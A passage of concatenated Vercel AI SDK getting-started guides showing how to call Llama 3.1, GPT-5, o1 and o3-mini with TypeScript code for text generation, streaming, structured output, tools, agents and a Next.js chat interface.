The useChat hook on your root page (app/page.tsx) will make a request to your LLM provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
Claude 3.7 Sonnet opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.
title: Get started with Llama 3.1
description: Get started with Llama 3.1 using the AI SDK.
tags: ['getting-started']
Get started with Llama 3.1
With the release of Llama 3.1, there has never been a better time to start building AI applications.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Llama 3.1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Llama 3.1
The release of Meta's Llama 3.1 is an important moment in AI development. As the first state-of-the-art open-weight AI model, Llama 3.1 is helping accelerate how developers build AI apps. Available in 8B, 70B, and 405B sizes, these instruction-tuned models work well for tasks like dialogue generation, translation, reasoning, and code generation.
Benchmarks
Llama 3.1 surpasses most available open-source chat models on common industry benchmarks and even outperforms some closed-source models, offering superior performance in language nuances, contextual understanding, and complex multi-step tasks. The models' refined post-training processes significantly improve response alignment, reduce false refusal rates, and enhance answer diversity, making Llama 3.1 a powerful and accessible tool for building generative AI applications.
Source: Meta AI - Llama 3.1 Model Card
Choosing Model Size
Llama 3.1 includes a new 405B-parameter model, the largest open-source model available today. This model is designed to handle the most complex and demanding tasks.
When choosing between the different sizes of Llama 3.1 models (405B, 70B, 8B), consider the trade-off between performance and computational requirements. The 405B model offers the highest accuracy and capability for complex tasks but requires significant computational resources. The 70B model provides a good balance of performance and efficiency for most applications, while the 8B model is suitable for simpler tasks or resource-constrained environments where speed and lower computational overhead are priorities.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Llama 3.1 (using DeepInfra) with the AI SDK:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
prompt: 'What is love?',
});
AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. Prefer to use Amazon Bedrock? The unified interface also means that you can easily switch between models by changing just two lines of code.
import { generateText } from 'ai';
import { bedrock } from '@ai-sdk/amazon-bedrock';
const { text } = await generateText({
model: bedrock('meta.llama3-1-405b-instruct-v1'),
prompt: 'What is love?',
});
Streaming the Response
To stream the model's response as it's being generated, update your code snippet to use the streamText function.
import { streamText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
const { textStream } = streamText({
model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
prompt: 'What is love?',
});
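The textStream is an async iterable, so you can print each chunk as it arrives:
for await (const delta of textStream) {
  process.stdout.write(delta);
}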
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
const { output } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Tools
While LLMs have incredible generation capabilities, they struggle with discrete tasks (e.g. mathematics) and interacting with the outside world (e.g. getting the weather). The solution: tools, which are like programs that you provide to the model, which it can choose to call as necessary.
Using Tools with the AI SDK
The AI SDK supports tool usage across several of its functions, including generateText and streamUI. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.
Here's an example of how you can use a tool with the AI SDK and Llama 3.1:
import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'What is the weather like today?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data, enhancing its ability to provide accurate and up-to-date information.
Agents
Agents take your AI applications a step further by allowing models to execute multiple steps (i.e. tools) in a non-deterministic way, making decisions based on context and user input.
Agents use LLMs to choose the next step in a problem-solving process. They can reason at each step and make decisions based on the evolving context.
Implementing Agents with the AI SDK
The AI SDK supports agent implementation through the stopWhen parameter and built-in stop conditions. This allows the model to make multiple decisions and tool calls in a single interaction.
Here's an example of an agent that solves math problems:
import { generateText, tool, stepCountIs } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import * as mathjs from 'mathjs';
import { z } from 'zod';
const problem =
'Calculate the profit for a day if revenue is $5000 and expenses are $3500.';
const { text: answer } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
system:
'You are solving math problems. Reason step by step. Use the calculator when necessary.',
prompt: problem,
tools: {
calculate: tool({
description: 'A tool for evaluating mathematical expressions.',
inputSchema: z.object({ expression: z.string() }),
execute: async ({ expression }) => mathjs.evaluate(expression),
}),
},
stopWhen: stepCountIs(5),
});
In this example, the agent can use the calculator tool multiple times if needed, reasoning through the problem step by step.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Llama 3.1 (via DeepInfra):
import { deepinfra } from '@ai-sdk/deepinfra';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then streamed back in real-time and displayed in the chat UI.
This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Going Beyond Text
The AI SDK's React Server Components (RSC) API enables you to create rich, interactive interfaces that go beyond simple text generation. With the streamUI function, you can dynamically stream React components from the server to the client.
Let's dive into how you can leverage tools with AI SDK RSC to build a generative user interface with Next.js (App Router).
First, create a Server Action.
'use server';
import { streamUI } from '@ai-sdk/rsc';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
export async function streamComponent() {
const result = await streamUI({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'Get the weather for San Francisco',
text: ({ content }) => <div>{content}</div>,
tools: {
getWeather: {
description: 'Get the weather for a location',
inputSchema: z.object({ location: z.string() }),
generate: async function* ({ location }) {
yield <div>loading...</div>;
const weather = '25c'; // await getWeather(location);
return (
<div>
the weather in {location} is {weather}.
</div>
);
},
},
},
});
return result.value;
}
In this example, if the model decides to use the getWeather tool, it will first yield a div while fetching the weather data, then return a weather component with the fetched data (note: static data in this example). This allows for a more dynamic and responsive UI that can adapt based on the AI's decisions and external data.
On the frontend, you can call this Server Action like any other asynchronous function in your application. In this case, the function returns a regular React component.
'use client';
import { useState } from 'react';
import { streamComponent } from './actions';
export default function Page() {
const [component, setComponent] = useState<React.ReactNode>();
return (
<div>
<form
onSubmit={async e => {
e.preventDefault();
setComponent(await streamComponent());
}}
>
<button>Stream Component</button>
</form>
<div>{component}</div>
</div>
);
}
To see AI SDK RSC in action, check out our open-source Next.js Gemini Chatbot.
Migrate from OpenAI
One of the key advantages of the AI SDK is its unified API, which makes it incredibly easy to switch between different AI models and providers. This flexibility is particularly useful when you want to migrate from one model to another, such as moving from OpenAI's GPT models to Meta's Llama models hosted on DeepInfra.
Here's how simple the migration process can be:
OpenAI Example:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('gpt-4.1'),
prompt: 'What is love?',
});
Llama on DeepInfra Example:
import { generateText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'What is love?',
});
Thanks to the unified API, the core structure of the code remains the same. The main differences are:
- Creating a DeepInfra client
- Changing the model name from openai("gpt-4.1") to deepinfra("meta-llama/Meta-Llama-3.1-70B-Instruct").
With just these few changes, you've migrated from OpenAI's GPT-4.1 to Meta's Llama 3.1 hosted on DeepInfra. The generateText function and its usage remain identical, showcasing the power of the AI SDK's unified API.
This feature allows you to easily experiment with different models, compare their performance, and choose the best one for your specific use case without having to rewrite large portions of your codebase.
Prompt Engineering and Fine-tuning
While the Llama 3.1 family of models are powerful out-of-the-box, their performance can be enhanced through effective prompt engineering and fine-tuning techniques.
Prompt Engineering
Prompt engineering is the practice of crafting input prompts to elicit desired outputs from language models. It involves structuring and phrasing prompts in ways that guide the model towards producing more accurate, relevant, and coherent responses.
For more information on prompt engineering techniques (specific to Llama models), check out these resources:
Fine-tuning
Fine-tuning involves further training a pre-trained model on a specific dataset or task to customize its performance for particular use cases. This process allows you to adapt Llama 3.1 to your specific domain or application, potentially improving its accuracy and relevance for your needs.
To learn more about fine-tuning Llama models, check out these resources:
- Official Fine-tuning Llama Guide
- Fine-tuning and Inference with Llama 3
- Fine-tuning Models with Fireworks AI
- Fine-tuning Llama with Modal
Conclusion
The AI SDK offers a powerful and flexible way to integrate cutting-edge AI models like Llama 3.1 into your applications. With AI SDK Core, you can seamlessly switch between different AI models and providers by changing just two lines of code. This flexibility allows for quick experimentation and adaptation, reducing the time required to change models from days to minutes.
The AI SDK ensures that your application remains clean and modular, accelerating development and future-proofing against the rapidly evolving landscape.
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with GPT-5
description: Get started with GPT-5 using the AI SDK.
tags: ['getting-started']
Get started with OpenAI GPT-5
With the release of OpenAI's GPT-5 model, there has never been a better time to start building AI applications with advanced capabilities like verbosity control, web search, and native multi-modal understanding.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI GPT-5 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI GPT-5
OpenAI's GPT-5 represents their latest advancement in language models, offering powerful new features including verbosity control for tailored response lengths, integrated web search capabilities, reasoning summaries for transparency, and native support for text, images, audio, and PDFs. The model is available in three variants: gpt-5, gpt-5-mini for faster, more cost-effective processing, and gpt-5-nano for ultra-efficient operations.
Prompt Engineering for GPT-5
Here are the key strategies for effective prompting:
Core Principles
- Be precise and unambiguous: Avoid contradictory or ambiguous instructions. GPT-5 performs best with clear, explicit guidance.
- Use structured prompts: Leverage XML-like tags to organize different sections of your instructions for better clarity.
- Natural language works best: While being precise, write prompts as if you were explaining the task to a skilled colleague.
Prompting Techniques
1. Agentic Workflow Control
- Adjust the reasoningEffort parameter to calibrate model autonomy
- Set clear stop conditions and define explicit tool call budgets
- Provide guidance on exploration depth and persistence
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Example with reasoning effort control
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Analyze this complex dataset and provide insights.',
providerOptions: {
openai: {
reasoningEffort: 'high', // Increases autonomous exploration
},
},
});
2. Structured Prompt Format
Use XML-like tags to organize your prompts:
<context_gathering>
Goal: Extract key performance metrics from the report
Method: Focus on quantitative data and year-over-year comparisons
Early stop criteria: Stop after finding 5 key metrics
</context_gathering>
<task>
Analyze the attached financial report and identify the most important metrics.
</task>
3. Tool Calling Best Practices
- Use tool preambles to provide clear upfront plans
- Define safe vs. unsafe actions for different tools
- Create structured updates about tool call progress
4. Verbosity Control
- Use the textVerbosity parameter to control response length programmatically
- Override with natural language when needed for specific contexts
- Balance between conciseness and completeness
5. Optimization Workflow
- Start with a clear, simple prompt
- Test and identify areas of ambiguity or confusion
- Iteratively refine by removing contradictions
- Consider using OpenAI's Prompt Optimizer tool for complex prompts
- Document successful patterns for reuse
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI GPT-5 with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('gpt-5'),
prompt: 'Explain the concept of quantum entanglement.',
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { output } = await generateText({
model: openai('gpt-5'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Verbosity Control
One of GPT-5's new features is verbosity control, allowing you to adjust response length without modifying your prompt:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Concise response
const { text: conciseText } = await generateText({
model: openai('gpt-5'),
prompt: 'Explain quantum computing.',
providerOptions: {
openai: {
textVerbosity: 'low', // Produces terse, minimal responses
},
},
});
// Detailed response
const { text: detailedText } = await generateText({
model: openai('gpt-5'),
prompt: 'Explain quantum computing.',
providerOptions: {
openai: {
textVerbosity: 'high', // Produces comprehensive, detailed responses
},
},
});
Web Search
GPT-5 can access real-time information through the integrated web search tool:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'What are the latest developments in AI this week?',
tools: {
web_search: openai.tools.webSearch({
searchContextSize: 'high',
}),
},
});
// Access URL sources
const sources = result.sources;
Reasoning Summaries
For transparency into GPT-5's thought process, enable reasoning summaries:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai('gpt-5'),
prompt:
'Solve this logic puzzle: If all roses are flowers and some flowers fade quickly, do all roses fade quickly?',
providerOptions: {
openai: {
reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
},
},
});
// Stream reasoning and text separately
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
console.log(part.textDelta);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
Using Tools with the AI SDK
GPT-5 supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { toolResults } = await generateText({
model: openai('gpt-5'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI GPT-5:
In a new Next.js application, first install the AI SDK and the OpenAI provider:
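For example, with pnpm (the npm, yarn, and bun commands follow the same pattern; the package names match the imports used below):
pnpm add ai @ai-sdk/openai @ai-sdk/react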
Then, create a route handler for the chat endpoint:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('gpt-5'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({});
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/cookbook to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/cookbook/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with OpenAI o1 description: Get started with OpenAI o1 using the AI SDK. tags: ['getting-started', 'reasoning']
Get started with OpenAI o1
With the release of OpenAI's o1 series models, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI o1
OpenAI released a series of AI models designed to spend more time thinking before responding. They can reason through complex tasks and solve harder problems than previous models in science, coding, and math. These models, named the o1 series, are trained with reinforcement learning and can "think before they answer". As a result, they are able to produce a long internal chain of thought before responding to a prompt.
The main reasoning model available in the API is:
- o1: Designed to reason about hard problems using broad general knowledge about the world.
| Model | Streaming | Tools | Object Generation | Reasoning Effort |
|---|---|---|---|---|
| o1 | Supported | Supported | Supported | Supported |
Benchmarks
OpenAI o1 models excel in scientific reasoning, with impressive performance across various domains:
- Ranking in the 89th percentile on competitive programming questions (Codeforces)
- Placing among the top 500 students in the US in a qualifier for the USA Math Olympiad (AIME)
- Exceeding human PhD-level accuracy on a benchmark of physics, biology, and chemistry problems (GPQA)
Prompt Engineering for o1 Models
The o1 models perform best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:
- Keep prompts simple and direct: The models excel at understanding and responding to brief, clear instructions without the need for extensive guidance.
- Avoid chain-of-thought prompts: Since these models perform reasoning internally, prompting them to "think step by step" or "explain your reasoning" is unnecessary.
- Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input, helping the model interpret different sections appropriately.
- Limit additional context in retrieval-augmented generation (RAG): When providing additional context or documents, include only the most relevant information to prevent the model from overcomplicating its response.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o1 with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o1'),
prompt: 'Explain the concept of quantum entanglement.',
});
AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. The unified interface also means that you can easily switch between models by changing just one line of code.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
  model: openai('gpt-4o'), // switching from o1 to gpt-4o is a one-line change
  prompt: 'Explain the concept of quantum entanglement.',
});
Refining Reasoning Effort
You can control the amount of reasoning effort expended by o1 through the reasoningEffort parameter.
This parameter can be set to 'low', 'medium', or 'high' to adjust how much time and computation the model spends on internal reasoning before producing a response.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Reduce reasoning effort for faster responses
const { text } = await generateText({
model: openai('o1'),
prompt: 'Explain quantum entanglement briefly.',
providerOptions: {
openai: { reasoningEffort: 'low' },
},
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { output } = await generateText({
model: openai('o1'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Structured object generation is supported with o1.
Tools
While LLMs have incredible generation capabilities, they struggle with discrete tasks (e.g. mathematics) and interacting with the outside world (e.g. getting the weather). The solution: tools, which are like programs that you provide to the model, which it can choose to call as necessary.
Using Tools with the AI SDK
The AI SDK supports tool usage across several of its functions, like generateText and streamText. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.
Here's an example of how you can use a tool with the AI SDK and o1:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai('o1'),
prompt: 'What is the weather like today?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Tools are compatible with o1.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o1:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 5 minutes
export const maxDuration = 300;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('o1'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}
      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out our support for the o1 series of reasoning models in the OpenAI Provider.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with OpenAI o3-mini description: Get started with OpenAI o3-mini using the AI SDK. tags: ['getting-started', 'reasoning']
Get started with OpenAI o3-mini
With the release of OpenAI's o3-mini model, there has never been a better time to start building AI applications, particularly those that require complex STEM reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o3-mini alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI o3-mini
OpenAI recently released a new AI model optimized for STEM reasoning that excels in science, math, and coding tasks. o3-mini matches o1's performance in these domains while delivering faster responses and lower costs. The model supports tool calling, structured outputs, and system messages, making it a great option for a wide range of applications.
o3-mini offers three reasoning effort levels:
- Low: Optimized for speed while maintaining solid reasoning capabilities
- Medium: Balanced approach matching o1's performance levels
- High: Enhanced reasoning power exceeding o1 in many STEM domains
| Model | Streaming | Tool Calling | Structured Output | Reasoning Effort | Image Input |
|---|---|---|---|---|---|
| o3-mini | Supported | Supported | Supported | Supported | Not supported |
Benchmarks
OpenAI o3-mini demonstrates impressive performance across technical domains:
- 87.3% accuracy on AIME competition math questions
- 79.7% accuracy on PhD-level science questions (GPQA Diamond)
- 2130 Elo rating on competitive programming (Codeforces)
- 49.3% accuracy on verified software engineering tasks (SWE-bench)
These benchmark results were obtained with the high reasoning effort setting.
Prompt Engineering for o3-mini
The o3-mini model performs best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:
- Keep prompts simple and direct: The model excels at understanding and responding to brief, clear instructions without the need for extensive guidance.
- Avoid chain-of-thought prompts: Since the model performs reasoning internally, prompting it to "think step by step" or "explain your reasoning" is unnecessary.
- Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o3-mini with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'Explain the concept of quantum entanglement.',
});
Refining Reasoning Effort
You can control the amount of reasoning effort expended by o3-mini through the reasoningEffort parameter.
This parameter can be set to low, medium, or high to adjust how much time and computation the model spends on internal reasoning before producing a response.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Reduce reasoning effort for faster responses
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'Explain quantum entanglement briefly.',
providerOptions: {
openai: { reasoningEffort: 'low' },
},
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { output } = await generateText({
model: openai('o3-mini'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
